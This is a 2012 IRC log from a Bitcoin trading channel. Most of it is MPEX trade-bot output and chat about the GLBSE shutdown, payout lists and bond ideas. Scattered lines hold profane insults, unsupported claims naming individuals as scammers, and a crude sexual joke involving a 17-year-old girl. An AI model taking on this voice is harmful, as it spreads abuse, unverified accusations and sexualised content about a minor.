payments. Nov 25 02:36:03 yeah, one for each Nov 25 02:36:05 and no duplicates Nov 25 02:36:19 If his script checked only for that, even if they were not duplicates, the script might have excluded you from lists. Nov 25 02:36:32 I doubt he automatically generated them. Nov 25 02:36:45 Is what I mean. Nov 25 02:36:55 he should have Nov 25 02:37:03 its like easy shmeezy perl Nov 25 02:37:17 this is like perl one liner material Nov 25 02:37:19 I meant I doubt he manually generated them* Nov 25 02:37:24 oh Nov 25 02:37:26 [MPEX] [S.MPOE] 2345 @ 0.00052336 = 1.2273 BTC [-] Nov 25 02:37:27 [MPEX] [S.MPOE] 8013 @ 0.00052275 = 4.1888 BTC [-] Nov 25 02:37:29 [MPEX] [S.MPOE] 10897 @ 0.00052034 = 5.6701 BTC [-] Nov 25 02:37:40 so basically he flagged everyone who he paid per sub account? Nov 25 02:37:41 what a fucker Nov 25 02:37:58 ok. proper S.MPOE contract up... http://polimedia.us/bitcoin/mpex.php?mpsic=S.MPOE Nov 25 02:38:09 I'm just assuming he was putting an "OK" check on anyone who sent back a double-payment. Nov 25 02:38:12 please everyone error hunt Nov 25 02:38:21 Namjies: but he never contacted me Nov 25 02:38:22 smickles jurov Namjies ^ Nov 25 02:38:32 he knows my email Nov 25 02:38:32 Then used a script who excluded anyone receiving more than 1 payment and who was not OK'ed Nov 25 02:38:33 its public Nov 25 02:38:50 infact both my emails are public, he knows Im a forum mod, he knows Im on irc, he knows Im on github Nov 25 02:38:55 he also knows I have a blog Nov 25 02:39:05 He might not even have realized asset issuers were not included in the lists. Nov 25 02:39:13 If he's not manually making them. Nov 25 02:39:16 _wtf_ Nov 25 02:39:19 no wonder glbse failed Nov 25 02:39:22 hes a shitty coder Nov 25 02:40:01 yup, I recieved 4 payments from my glbse address Nov 25 02:40:05 Although no... Usagi was included on my list. Nov 25 02:40:11 And he had many assets. Nov 25 02:40:23 I forgot about that. Nov 25 02:40:24 7 and 27 (success and fail), 0.04 and 0.01 (dmc and myself) Nov 25 02:40:37 yeah but I dont know how he ran his assets Nov 25 02:40:47 he could have had a glbse account per Nov 25 02:40:49 oh wait nm Nov 25 02:40:58 asset creation causes sub accounts no matter what Nov 25 02:41:31 [MPEX] [S.MPOE] 12274 @ 0.00052034 = 6.3867 BTC [-] Nov 25 02:41:33 [MPEX] [S.MPOE] 9292 @ 0.0005189 = 4.8216 BTC [-] Nov 25 02:42:11 Diablo-D3 i didn;'t know you had a blog Nov 25 02:43:26 mircea_popescu: yeah, its been linked on slashdot's front page three times among other honors Nov 25 02:43:31 I should write for it more but meh Nov 25 02:43:33 so link ? Nov 25 02:44:04 shit nefario could have manually paid all the customers by now quicker than this and with less errors Nov 25 02:44:05 http://adterrasperaspera.com/ Nov 25 02:44:20 pigeons even if he had no arms Nov 25 02:44:28 and used like, his cock Nov 25 02:44:52 Diablo-D3 ill pay you a bitcoin if you write an article about either mpex or trilema. Nov 25 02:44:57 [MPEX] [S.MPOE] 2345 @ 0.00052661 = 1.2349 BTC [+] Nov 25 02:44:59 [MPEX] [S.MPOE] 7682 @ 0.00052723 = 4.0502 BTC [+] Nov 25 02:45:00 [MPEX] [S.MPOE] 14400 @ 0.00052735 = 7.5938 BTC [+] Nov 25 02:45:01 [MPEX] [S.MPOE] 10975 @ 0.00052741 = 5.7883 BTC [+] Nov 25 02:46:30 00:27 < Namjies> you had many subaccount on GLBSE right? ... <<< yes Nov 25 02:46:46 mircea_popescu: heh, I dont even write about dmc on my blog Nov 25 02:48:37 [MPEX] [S.MPOE] 11914 @ 0.00052741 = 6.2836 BTC [+] Nov 25 02:51:10 mircea_popescu: that contract should make s.mpoe more easily understood Nov 25 02:51:22 i would hope so Nov 25 02:51:23 hrm smickles Nov 25 02:51:28 will leave it like this for a little then sign it Nov 25 02:51:29 were you here when I was talking about DMC 2.0? Nov 25 02:51:35 would really appreciate open source typo finding etc. Nov 25 02:51:39 I don't think so Diablo-D3 Nov 25 02:51:43 smickles: okay so Nov 25 02:51:52 shares like I had with DMC were a complete failure Nov 25 02:51:58 so I dont want to go that route again Nov 25 02:52:22 what I want to do is OID coupon non-callable corporate bonds Nov 25 02:52:43 issue them serial numbered and pgp signed using a single use key then burn/bury the key Nov 25 02:55:50 smickles: so what do you think? Nov 25 02:59:22 heh, well, it sounds workable, but i'm an accountant, you might want to ask a lawyer/underwriter for advice Nov 25 03:00:51 bitcoin doesnt have any Nov 25 03:05:57 [MPEX] [S.MPOE] 2345 @ 0.00052536 = 1.232 BTC [-] Nov 25 03:05:59 [MPEX] [S.MPOE] 28700 @ 0.00052487 = 15.0638 BTC [-] Nov 25 03:06:00 [MPEX] [S.MPOE] 7200 @ 0.00052376 = 3.7711 BTC [-] Nov 25 03:06:01 [MPEX] [S.MPOE] 12105 @ 0.0005189 = 6.2813 BTC [-] Nov 25 03:08:54 [MPEX] [S.MPOE] 2345 @ 0.00052677 = 1.2353 BTC [+] Nov 25 03:08:56 [MPEX] [S.MPOE] 11027 @ 0.00052741 = 5.8158 BTC [+] Nov 25 03:08:57 [MPEX] [S.MPOE] 24269 @ 0.00052743 = 12.8002 BTC [+] Nov 25 03:10:02 i dunno, I think there are a few out ther Nov 25 03:11:30 but if you have a question about receivables, payables, payroll, and a myriad of other related things, I might be a good one to ask Nov 25 03:12:03 after the bonds are written, i know how to deal with them :) Nov 25 03:15:54 [MPEX] [S.MPOE] 2345 @ 0.00051954 = 1.2183 BTC [-] Nov 25 03:15:56 [MPEX] [S.MPOE] 8251 @ 0.0005189 = 4.2814 BTC [-] Nov 25 03:15:57 [MPEX] [S.MPOE] 7904 @ 0.00051362 = 4.0597 BTC [-] Nov 25 03:21:53 [MPEX] [S.MPOE] 38000 @ 0.00051362 = 19.5176 BTC [-] Nov 25 03:29:56 I suppose you're not qualified at all to fill Canadian tax reports eh. Nov 25 03:30:11 I'll have to find myself an accountant. Nov 25 03:37:50 [MPEX] [S.MPOE] 2345 @ 0.00051824 = 1.2153 BTC [+] Nov 25 03:37:52 [MPEX] [S.MPOE] 8455 @ 0.00051867 = 4.3854 BTC [+] Nov 25 03:40:16 [MPEX] [S.MPOE] 27216 @ 0.00051867 = 14.1161 BTC [+] Nov 25 03:40:18 [MPEX] [S.MPOE] 20243 @ 0.00052035 = 10.5334 BTC [+] Nov 25 03:44:48 [MPEX] [S.MPOE] 13350 @ 0.00051702 = 6.9022 BTC [-] Nov 25 03:46:26 http://en.wikipedia.org/w/index.php?title=Talk%3ABitcoin&diff=524732413&oldid=524729775 Nov 25 03:46:29 srsly Nov 25 03:50:23 summary ? Nov 25 03:51:21 mircea_popescu: dude keeps going on about how peeps use the wrong definition of a ponzi, i do a line by line contrast of the sec's definition of a ponzi and Bitcoin Nov 25 03:51:38 there is a supreme court definition Nov 25 03:51:38 [MPEX] [S.MPOE] 25890 @ 0.00051702 = 13.3856 BTC [-] Nov 25 03:51:39 [MPEX] [S.MPOE] 22810 @ 0.00052035 = 11.8692 BTC [+] Nov 25 03:52:01 the guy kept going on about the SEC's definition tho Nov 25 03:52:14 if he want's to move the goalposts again, let him Nov 25 03:52:39 lol Nov 25 03:52:48 is this that zeroshadow or w/e guy ? Nov 25 03:52:57 SudoGhost Nov 25 03:53:00 ya Nov 25 03:54:08 http://www.stevequayle.com/index.php?s=33&d=196 Nov 25 03:54:12 this is kinda funny. Nov 25 03:57:17 [MPEX] [S.MPOE] 2345 @ 0.00051416 = 1.2057 BTC [-] Nov 25 03:57:19 [MPEX] [S.MPOE] 3196 @ 0.00051362 = 1.6415 BTC [-] Nov 25 03:57:20 [MPEX] [S.MPOE] 19500 @ 0.00051343 = 10.0119 BTC [-] Nov 25 03:57:21 [MPEX] [S.MPOE] 11528 @ 0.00051085 = 5.8891 BTC [-] Nov 25 03:57:21 [MPEX] [S.MPOE] 9431 @ 0.00050865 = 4.7971 BTC [-] Nov 25 03:57:34 lol Nov 25 03:58:51 Boniek stated that he was in control of the court and dismissed the case against himself."" Nov 25 04:00:01 The policeman pointed to Boniek's waistband, which was covered with sweater and coat. The policeman suggested that Boniek was concealing a handgun, <<< what a fucking bitch Nov 25 04:00:53 just when you though hacking wasn't for girls -> http://scanlime.org/2012/11/hacking-my-vagina/ Nov 25 04:04:16 [MPEX] [S.MPOE] 2345 @ 0.00051491 = 1.2075 BTC [+] Nov 25 04:04:17 [MPEX] [S.MPOE] 15050 @ 0.00051536 = 7.7562 BTC [+] Nov 25 04:04:18 [MPEX] [S.MPOE] 5347 @ 0.00052035 = 2.7823 BTC [+] Nov 25 04:04:19 [MPEX] [S.MPOE] 3950 @ 0.00052341 = 2.0675 BTC [+] Nov 25 04:04:20 [MPEX] [S.MPOE] 12059 @ 0.00052393 = 6.3181 BTC [+] Nov 25 04:13:07 mircea_popescu: http://www.reddit.com/r/Bitcoin/comments/13qosb/comparison_of_bitcoin_and_the_sec_definition_of_a/c769y0i Nov 25 04:17:25 curious how tjhat'll go. Nov 25 04:18:00 well, there is already an appeal that anyone else stand on the side of SudoGhost Nov 25 04:21:00 [MPEX] [S.MPOE] 39300 @ 0.00052149 = 20.4946 BTC [-] Nov 25 04:21:02 [MPEX] [S.MPOE] 19500 @ 0.00051603 = 10.0626 BTC [-] Nov 25 04:21:03 [MPEX] [S.MPOE] 8200 @ 0.00050865 = 4.1709 BTC [-] Nov 25 04:22:25 well, when your wife asks you to give her the ruler... Nov 25 04:27:55 [MPEX] [S.MPOE] 2345 @ 0.00050907 = 1.1938 BTC [+] Nov 25 04:27:56 [MPEX] [S.MPOE] 26919 @ 0.00050865 = 13.6923 BTC [-] Nov 25 04:29:27 [MPEX] [S.MPOE] 24450 @ 0.00050705 = 12.3974 BTC [-] Nov 25 04:41:52 on the bottom ? Nov 25 04:45:33 [MPEX] [S.MPOE] 21300 @ 0.00050638 = 10.7859 BTC [-] Nov 25 04:45:34 [MPEX] [S.MPOE] 19200 @ 0.00050621 = 9.7192 BTC [-] Nov 25 04:51:26 [MPEX] [S.MPOE] 14680 @ 0.00050621 = 7.4312 BTC [-] Nov 25 04:51:27 [MPEX] [S.MPOE] 22920 @ 0.00050617 = 11.6014 BTC [-] Nov 25 04:55:32 [MPEX] [S.DICE] 1250 @ 0.00332909 = 4.1614 BTC [-] Nov 25 05:06:41 [MPEX] [S.MPOE] 15583 @ 0.00050617 = 7.8876 BTC [-] Nov 25 05:08:51 [MPEX] [S.MPOE] 4547 @ 0.00050617 = 2.3016 BTC [-] Nov 25 05:08:53 [MPEX] [S.MPOE] 22306 @ 0.0005059 = 11.2846 BTC [-] Nov 25 05:18:14 [MPEX] [S.MPOE] 544 @ 0.0005059 = 0.2752 BTC [-] Nov 25 05:18:15 [MPEX] [S.MPOE] 30649 @ 0.00050556 = 15.4949 BTC [-] Nov 25 05:18:17 [MPEX] [S.MPOE] 19807 @ 0.00050469 = 9.9964 BTC [-] Nov 25 05:19:14 [MPEX] [S.MPOE] 29895 @ 0.00050469 = 15.0877 BTC [-] Nov 25 05:19:16 [MPEX] [S.MPOE] 16855 @ 0.00050463 = 8.5055 BTC [-] Nov 25 05:21:22 [MPEX] [S.MPOE] 1986 @ 0.00050705 = 1.007 BTC [+] Nov 25 05:21:24 [MPEX] [S.MPOE] 24864 @ 0.00051272 = 12.7483 BTC [+] Nov 25 05:26:06 [MPEX] [S.MPOE] 29545 @ 0.00050463 = 14.9093 BTC [-] Nov 25 05:26:07 [MPEX] [S.MPOE] 24755 @ 0.0005032 = 12.4567 BTC [-] Nov 25 05:35:19 [MPEX] [S.MPOE] 2345 @ 0.00050915 = 1.194 BTC [+] Nov 25 05:35:20 [MPEX] [S.MPOE] 9605 @ 0.00050983 = 4.8969 BTC [+] Nov 25 05:37:14 12.5 on gox Nov 25 05:37:23 nifty Nov 25 05:38:00 [MPEX] [S.MPOE] 6845 @ 0.00050983 = 3.4898 BTC [+] Nov 25 05:38:02 [MPEX] [S.MPOE] 4936 @ 0.00051272 = 2.5308 BTC [+] Nov 25 05:38:38 ;;calc [ticker --last] * 0.00051272 * 1000000000 Nov 25 05:38:38 6417664.968 Nov 25 05:40:12 smickles what did icbit close at ? Nov 25 05:40:40 11.89585 Nov 25 05:40:53 i see Nov 25 05:41:16 it's been about the same for 3 days now Nov 25 05:41:57 ridoinculous. Nov 25 05:42:00 [MPEX] [S.MPOE] 1000 @ 0.00052392 = 0.5239 BTC [+] Nov 25 05:42:01 [MPEX] [S.MPOE] 26503 @ 0.00052393 = 13.8857 BTC [+] Nov 25 05:42:01 ;;tslb Nov 25 05:42:09 Time since last block: 32 minutes and 27 seconds Nov 25 05:42:18 i could buy it all the way to 12.5 right now, but this volatility on gox is getting out of hand, i'm not sure if a sharp dip is around the corner or not Nov 25 05:42:19 aren't these things supposed to be 6 minutes apart. Nov 25 05:42:25 10 Nov 25 05:42:34 on average Nov 25 05:42:35 right. even so... Nov 25 05:42:56 re icbit : i wouldn't buy up to anything on full leverage. Nov 25 05:43:32 it'd take about half my (personal) margin Nov 25 05:44:04 that may be sustainable. Nov 25 05:44:11 i've got a bid at 11.8, that's where my spooky sense starts tingling Nov 25 05:45:38 so smickles Nov 25 05:45:48 so jcpham Nov 25 05:45:56 those 160btc in s2cm shares are gone now Nov 25 05:45:57 [MPEX] [S.MPOE] 17123 @ 0.00051696 = 8.8519 BTC [-] Nov 25 05:46:02 because nefario is a cunt Nov 25 05:46:05 correct? Nov 25 05:46:21 i dunno, was there news that he's not giving us info? Nov 25 05:46:29 have i properly summarized the situation? Nov 25 05:46:41 he's given back info to some people Nov 25 05:46:49 4 a day. on average. Nov 25 05:46:55 if 4 is 3 and day is week. Nov 25 05:47:01 ic Nov 25 05:47:01 if we get infos, we're liquidating and paying the shareholders Nov 25 05:47:21 i'm going to have to say all bitcoin site admins are cunts Nov 25 05:47:25 going forwards Nov 25 05:47:39 history has meaning and it should never be ignored Nov 25 05:47:39 did you file an account claim with glbse? Nov 25 05:47:55 i logged in and submitted said details Nov 25 05:47:57 jcpham i go backwards... Nov 25 05:48:04 under duress if subpoened Nov 25 05:48:09 well, you've done all that i know you can Nov 25 05:48:38 mircea_popescu you can be in cunt club if you want Nov 25 05:48:42 it's invite only Nov 25 05:48:43 unfair generalisation. i was trading when pirate was just a tyke. Nov 25 05:48:49 i was in business when bitcoinica was getting started Nov 25 05:48:59 i was here throughout. you can't say ALL. Nov 25 05:49:02 so nyah. Nov 25 05:49:04 show me the screenshots Nov 25 05:49:05 jcpham: render me an opinion of that widget on the right under the search bar http://blog.smickles.com/ Nov 25 05:49:12 no romanian blog bullshit either Nov 25 05:49:12 what'd you like to see ? Nov 25 05:49:15 [MPEX] [S.MPOE] 2345 @ 0.00050382 = 1.1815 BTC [-] Nov 25 05:49:16 [MPEX] [S.MPOE] 1295 @ 0.0005032 = 0.6516 BTC [-] Nov 25 05:49:18 [MPEX] [S.MPOE] 14720 @ 0.00050294 = 7.4033 BTC [-] Nov 25 05:49:19 [MPEX] [S.MPOE] 9245 @ 0.00050198 = 4.6408 BTC [-] Nov 25 05:49:58 mircea_popescu jon matonis was sharing your blog the other day Nov 25 05:49:59 jcpham: re the bitcoinica mention, i can vouch that mpoe was there before bitcoinica Nov 25 05:50:09 you'll have to clean up your act Nov 25 05:50:25 it was an email interface, but it worked Nov 25 05:50:37 6395 kreal 58 mircea_popescu 2011-07-26 05:10:22 1 sold 60 bitcoins, payment first. no problems. Nov 25 05:50:38 there. Nov 25 05:50:51 jcpham oh ? Nov 25 05:50:52 -otc is a joke and can't be trusted Nov 25 05:51:10 so what, kreal lied about me buying 60 btc last july ? Nov 25 05:51:11 WHAT!?! Nov 25 05:51:17 OMG WHAT did he say Nov 25 05:51:22 yep. Nov 25 05:51:26 uhm Nov 25 05:51:39 jcpham: can i have some of what you're drinking? Nov 25 05:51:45 no! Nov 25 05:51:48 lol Nov 25 05:51:56 ;P Nov 25 05:51:58 he's drinking 17 yo virgin girl tears from hard spanking Nov 25 05:52:05 mixed with goose breastmilk Nov 25 05:52:09 makes me invisible Nov 25 05:52:15 :o Nov 25 05:52:38 ;;tslb Nov 25 05:52:39 Time since last block: 2 minutes and 1 second Nov 25 05:52:57 i was just joking but not really Nov 25 05:53:06 about all of that Nov 25 05:53:09 whatever i said Nov 25 05:55:11 lol Nov 25 05:55:22 so what about my act ? Nov 25 05:55:45 thankfully we haven't crossed swords yet Nov 25 05:55:53 who ? you and matonis ? Nov 25 05:56:03 only 4 more to go to hit the top of /r/bitcoin Nov 25 05:56:19 btw smickles your blog looks all fucked up in opera Nov 25 05:56:26 i'm sorry i'm confused Nov 25 05:56:27 everything on the left column is scrunched in bottom Nov 25 05:57:27 oh jeez Nov 25 05:58:06 https://plus.google.com/100109831949151899859/posts/RdSRMn5B9gK Nov 25 05:58:11 was my reference Nov 25 05:58:11 smickles user browsershots.org Nov 25 05:58:24 i like the internet because i can cite things Nov 25 05:58:44 I can't say I particularly liked this article. The tone was very hurtful to those people. I imagine any "Imbecilitarians" reading it would be offended. Nov 25 05:58:45 ahahaha Nov 25 05:58:45 notice how kind i am Nov 25 05:59:07 i thought you were a real friend Nov 25 05:59:11 i am Nov 25 05:59:19 but the internet isn't real Nov 25 05:59:28 dericc aztrott ?! Nov 25 05:59:34 god put the internet here for my amusement Nov 25 05:59:38 that name alone... i imagine it must have been very hurtful in jr high Nov 25 05:59:50 cold Nov 25 05:59:59 you know when you get drunk you sound like reeses sober. Nov 25 06:00:11 i'm not druuuuuuunk Nov 25 06:00:15 a ok. Nov 25 06:00:44 join the g+ and friend me up Nov 25 06:00:50 i don't have a g Nov 25 06:00:54 give your datas to google Nov 25 06:00:58 [MPEX] [S.MPOE] 2345 @ 0.00050779 = 1.1908 BTC [+] Nov 25 06:00:58 IT's A MYTH Nov 25 06:00:59 [MPEX] [S.MPOE] 11914 @ 0.00050846 = 6.0578 BTC [+] Nov 25 06:01:07 i don't even have a gmail acct. Nov 25 06:01:11 google needs all your data to feed Nov 25 06:01:26 without your data there can be no driverless cars Nov 25 06:01:57 but i don't want driverless cars. Nov 25 06:02:09 i want like... 5 cars per mn pop, and driven by buxom topless chicks. Nov 25 06:02:13 me neither but google still needs the data Nov 25 06:02:38 google's new game turns your cell phone into a street view camera Nov 25 06:02:41 think how great london would be if there were like 30 cars in all of it Nov 25 06:03:49 and i could tear through the streets as fast as i want? Nov 25 06:03:56 well pretty much Nov 25 06:03:56 pretty freaking awesome Nov 25 06:04:07 you'd have to get D cups to be allowed to drive tho Nov 25 06:04:27 mircea_popescu: only one that looks strange is opera on debian 6 Nov 25 06:04:42 smickles a ok disregard then Nov 25 06:05:02 btw : i'm working with a crew to release a bitcoin 2 minute video. if it comes through it will be lulzy. Nov 25 06:05:14 oh, well, that widget i was asking about is slightly off on some things Nov 25 06:06:05 lolwut: http://api.browsershots.org/png/original/08/0854ae5085fb55e12550a0c2135aa06e.png Nov 25 06:06:36 windows rules so much Nov 25 06:07:08 wow, dillo pulled a cert warning out of an http page Nov 25 06:09:00 looks f'n sweet on links Nov 25 06:13:40 [MPEX] [S.MPOE] 28291 @ 0.00050934 = 14.4097 BTC [+] Nov 25 06:13:41 [MPEX] [S.MPOE] 28700 @ 0.00050712 = 14.5543 BTC [-] Nov 25 06:13:43 [MPEX] [S.MPOE] 394 @ 0.00050198 = 0.1978 BTC [-] Nov 25 06:17:49 [MPEX] [S.MPOE] 2345 @ 0.00050244 = 1.1782 BTC [+] Nov 25 06:17:51 [MPEX] [S.MPOE] 10311 @ 0.00050198 = 5.1759 BTC [-] Nov 25 06:17:52 [MPEX] [S.MPOE] 12266 @ 0.00050119 = 6.1476 BTC [-] Nov 25 06:17:52 [MPEX] [S.MPOE] 10878 @ 0.00049915 = 5.4298 BTC [-] Nov 25 06:18:25 [MPEX] [S.MPOE] 5827 @ 0.00049915 = 2.9085 BTC [-] Nov 25 06:19:33 dillo pulled a cert warning out of an http page << rich Nov 25 06:20:43 Nov 25 06:20:45 possible cause Nov 25 06:21:23 ah, the truth will out Nov 25 06:21:30 [MPEX] [S.MPOE] 10701 @ 0.00049912 = 5.3411 BTC [-] Nov 25 06:22:08 that's only there for the fancy gen your own donation addy Nov 25 06:25:30 currently, icbit is offering 7.85~x leverage Nov 25 06:26:11 uh Nov 25 06:26:51 it changes based on recent volatility in the buz2 market Nov 25 06:27:24 uh Nov 25 06:31:46 [MPEX] [S.MPOE] 38473 @ 0.00049913 = 19.203 BTC [+] Nov 25 06:31:48 [MPEX] [S.MPOE] 11200 @ 0.00050293 = 5.6328 BTC [+] Nov 25 06:31:49 [MPEX] [S.MPOE] 22392 @ 0.00050669 = 11.3458 BTC [+] Nov 25 06:31:50 [MPEX] [S.MPOE] 30000 @ 0.00051242 = 15.3726 BTC [+] Nov 25 06:31:51 [MPEX] [S.MPOE] 18100 @ 0.00051864 = 9.3874 BTC [+] Nov 25 06:31:52 [MPEX] [S.MPOE] 33966 @ 0.00052187 = 17.7258 BTC [+] Nov 25 06:31:53 [MPEX] [S.MPOE] 16859 @ 0.00052393 = 8.8329 BTC [+] Nov 25 06:33:00 !ticker s.dice Nov 25 06:33:02 [MPEX:S.DICE] 1day: 0.00308319 / 0.00323193 / 0.00339944 (34024 shares, 109.96 BTC), 30day: 0.00180002 / 0.00331778 / 0.00339944 (941672 shares, 3,124.26 BTC) Nov 25 06:42:35 [MPEX] [S.MPOE] 2345 @ 0.00052576 = 1.2329 BTC [+] Nov 25 06:42:36 [MPEX] [S.MPOE] 11463 @ 0.00052626 = 6.0325 BTC [+] Nov 25 06:44:10 [MPEX] [S.MPOE] 2345 @ 0.0005257 = 1.2328 BTC [-] Nov 25 06:44:11 [MPEX] [S.MPOE] 30177 @ 0.000525 = 15.8429 BTC [-] Nov 25 06:45:36 ;;ticker Nov 25 06:45:36 BTCUSD ticker | Best bid: 12.51000, Best ask: 12.51990, Bid-ask spread: 0.00990, Last trade: 12.51000, 24 hour volume: 19222.98667956, 24 hour low: 12.25000, 24 hour high: 12.55000, 24 hour vwap: 12.41369 Nov 25 06:45:52 so it broke the .5 Nov 25 06:46:05 well i'm off to bed **** BEGIN LOGGING AT Sun Nov 25 16:15:00 2012 Nov 25 16:15:44 [MPEX] [S.MPOE] 2345 @ 0.00052494 = 1.231 BTC [+] Nov 25 16:15:45 [MPEX] [S.MPOE] 16450 @ 0.00052501 = 8.6364 BTC [+] Nov 25 16:15:46 [MPEX] [S.MPOE] 10239 @ 0.00052974 = 5.424 BTC [+] Nov 25 16:15:47 [MPEX] [S.MPOE] 20590 @ 0.00053001 = 10.9129 BTC [+] Nov 25 16:15:55 63! Nov 25 16:15:58 53 even Nov 25 16:15:59 ;;ticker Nov 25 16:16:00 BTCUSD ticker | Best bid: 12.39993, Best ask: 12.39994, Bid-ask spread: 0.00001, Last trade: 12.39993, 24 hour volume: 25409.97316755, 24 hour low: 12.30001, 24 hour high: 12.60000, 24 hour vwap: 12.47317 Nov 25 16:21:33 [MPEX] [S.MPOE] 2345 @ 0.00052326 = 1.227 BTC [-] Nov 25 16:21:34 [MPEX] [S.MPOE] 29950 @ 0.00052308 = 15.6662 BTC [-] Nov 25 16:24:34 https://bitcointalk.org/index.php?topic=95826.40 so it turns out ciuciu is in default Nov 25 16:24:37 copumpkin ^ Nov 25 16:25:28 [MPEX] [S.MPOE] 2855 @ 0.0005154 = 1.4715 BTC [-] Nov 25 16:25:29 [MPEX] [S.MPOE] 12000 @ 0.00051517 = 6.182 BTC [-] Nov 25 16:25:31 [MPEX] [S.MPOE] 11563 @ 0.00051474 = 5.9519 BTC [-] Nov 25 16:25:32 [MPEX] [S.MPOE] 4882 @ 0.0005146 = 2.5123 BTC [-] Nov 25 16:41:08 [MPEX] [S.MPOE] 12637 @ 0.0005146 = 6.503 BTC [-] Nov 25 16:41:09 [MPEX] [S.MPOE] 8581 @ 0.00051382 = 4.4091 BTC [-] Nov 25 16:41:11 [MPEX] [S.MPOE] 5332 @ 0.00051284 = 2.7345 BTC [-] Nov 25 16:42:26 [MPEX] [S.MPOE] 22205 @ 0.00052168 = 11.5839 BTC [+] Nov 25 16:50:55 [MPEX] [S.MPOE] 25650 @ 0.0005246 = 13.456 BTC [+] Nov 25 16:50:56 [MPEX] [S.MPOE] 1410 @ 0.00053001 = 0.7473 BTC [+] Nov 25 16:50:58 [MPEX] [S.MPOE] 10450 @ 0.00053053 = 5.544 BTC [+] Nov 25 16:50:59 [MPEX] [S.MPOE] 5290 @ 0.00053212 = 2.8149 BTC [+] Nov 25 16:52:47 [MPEX] [S.MPOE] 2345 @ 0.00053177 = 1.247 BTC [-] Nov 25 16:52:49 [MPEX] [S.MPOE] 15155 @ 0.00053212 = 8.0643 BTC [+] Nov 25 16:58:35 [MPEX] [S.MPOE] 19550 @ 0.00053128 = 10.3865 BTC [-] Nov 25 16:58:37 [MPEX] [S.MPOE] 18255 @ 0.00053212 = 9.7139 BTC [+] Nov 25 16:58:38 [MPEX] [S.MPOE] 10813 @ 0.0005329 = 5.7622 BTC [+] Nov 25 16:58:39 [MPEX] [S.MPOE] 58232 @ 0.00053291 = 31.0324 BTC [+] Nov 25 16:59:55 [MPEX] [S.MPOE] 18100 @ 0.00053291 = 9.6457 BTC [+] Nov 25 17:22:15 mircea_popescu: he should start doing porn Nov 25 17:22:32 all that's missing. Nov 25 17:22:52 granny porn, maybe. for symmetry. Nov 25 17:26:35 heh, in the post ciuciu wrote "You now want me to pay back, following a list given by you the thieves. Am I correct?" Sounds like he got one of those dbl payments. Nov 25 17:26:57 So that means he has funds to make good on his buyback :P Nov 25 17:26:59 almost alll asset issuers on GLBSE are scammers and now that glbse is closed, the scammers come out of closet Nov 25 17:27:48 cuicui, goat, gigavps, name them Nov 25 17:27:53 I dont think any "bonds" on gblse ever did good/proper, did they? Nov 25 17:27:53 oh, where was that image Nov 25 17:28:01 havent they all turned out to be scams? Nov 25 17:28:18 almost all, glbse investors are fucked Nov 25 17:29:00 [MPEX] [S.MPOE] 15075 @ 0.00052811 = 7.9613 BTC [-] Nov 25 17:29:14 seems the mining rigs (the real ones) were the only ones that were not intented to be scams. (and even then, some try it) Nov 25 17:30:04 http://polimedia.us/dtng/c/src/134654389322.png Nov 25 17:33:03 [MPEX] [S.DICE] 7700 @ 0.00339999 = 26.1799 BTC [+] Nov 25 17:33:46 [MPEX] [S.MPOE] 2342 @ 0.00052811 = 1.2368 BTC [-] Nov 25 17:33:47 [MPEX] [S.MPOE] 35000 @ 0.00052922 = 18.5227 BTC [+] Nov 25 17:33:49 [MPEX] [S.MPOE] 1968 @ 0.00053291 = 1.0488 BTC [+] Nov 25 17:33:50 [MPEX] [S.MPOE] 2290 @ 0.00053346 = 1.2216 BTC [+] Nov 25 17:36:56 Namjies.. if he continues btc-mining, _might_ consider it Nov 25 17:39:31 [MPEX] [S.MPOE] 18850 @ 0.00053018 = 9.9939 BTC [-] Nov 25 17:39:33 [MPEX] [S.MPOE] 14750 @ 0.00053346 = 7.8685 BTC [+] Nov 25 17:43:34 [MPEX] [S.MPOE] 9836 @ 0.00053346 = 5.2471 BTC [+] Nov 25 17:49:17 [MPEX] [S.MPOE] 20735 @ 0.00053346 = 11.0613 BTC [+] Nov 25 17:49:19 [MPEX] [S.MPOE] 9351 @ 0.00053411 = 4.9945 BTC [+] Nov 25 17:49:20 [MPEX] [S.MPOE] 12814 @ 0.00053446 = 6.8486 BTC [+] Nov 25 17:56:45 [MPEX] [S.MPOE] 1000 @ 0.00053445 = 0.5345 BTC [-] Nov 25 17:56:45 [MPEX] [S.MPOE] 8236 @ 0.00053446 = 4.4018 BTC [+] Nov 25 17:56:47 [MPEX] [S.MPOE] 2114 @ 0.00053452 = 1.13 BTC [+] Nov 25 17:58:36 [MPEX] [S.MPOE] 31486 @ 0.00053452 = 16.8299 BTC [+] Nov 25 17:58:37 [MPEX] [S.MPOE] 13314 @ 0.00053456 = 7.1171 BTC [+] Nov 25 18:14:54 [MPEX] [S.MPOE] 19100 @ 0.0005328 = 10.1765 BTC [-] Nov 25 18:14:56 [MPEX] [S.MPOE] 1000 @ 0.00053455 = 0.5346 BTC [+] Nov 25 18:14:57 [MPEX] [S.MPOE] 12200 @ 0.00053456 = 6.5216 BTC [+] Nov 25 18:18:57 I sent cryptostocks an email telling him to announce his trades for assbot Nov 25 18:21:04 pigeons we had a chat a couple months back, he was going to do it then Nov 25 18:21:17 ok he's just on BFL time Nov 25 18:22:26 [MPEX] [S.MPOE] 10467 @ 0.00053116 = 5.5597 BTC [-] Nov 25 18:22:28 lol Nov 25 18:22:40 so i've been top fish for ~2 hours now, smickles take that! Nov 25 18:27:20 [MPEX] [S.MPOE] 2345 @ 0.00053078 = 1.2447 BTC [-] Nov 25 18:27:21 [MPEX] [S.MPOE] 8900 @ 0.00053054 = 4.7218 BTC [-] Nov 25 18:27:23 [MPEX] [S.MPOE] 12655 @ 0.00052793 = 6.681 BTC [-] Nov 25 18:29:40 [MPEX] [S.MPOE] 2345 @ 0.00053105 = 1.2453 BTC [+] Nov 25 18:29:41 [MPEX] [S.MPOE] 32833 @ 0.00053116 = 17.4396 BTC [+] Nov 25 18:29:43 [MPEX] [S.MPOE] 10517 @ 0.00053456 = 5.622 BTC [+] Nov 25 18:31:50 mircea_popescu how much did you blow on that game so far Nov 25 18:32:10 i made ~3btc last time, i'm ahead about 3 btc this time Nov 25 18:32:22 http://trilema.com/2012/the-biggest-fish-revisited/ sauce. Nov 25 18:32:33 screw mpex this is much more profitable Nov 25 18:32:44 lol not rly. Nov 25 18:32:54 3btc/day = 100 / month = peanuts. Nov 25 18:33:25 i think smickles made maybe 5 or so Nov 25 18:33:33 i sell about that much per month Nov 25 18:33:35 to live Nov 25 18:33:35 cause he got lucky, otherwise i'd have been +8 last time Nov 25 18:33:43 100, not 5. Nov 25 18:34:14 so i could live off fishes Nov 25 18:34:17 in 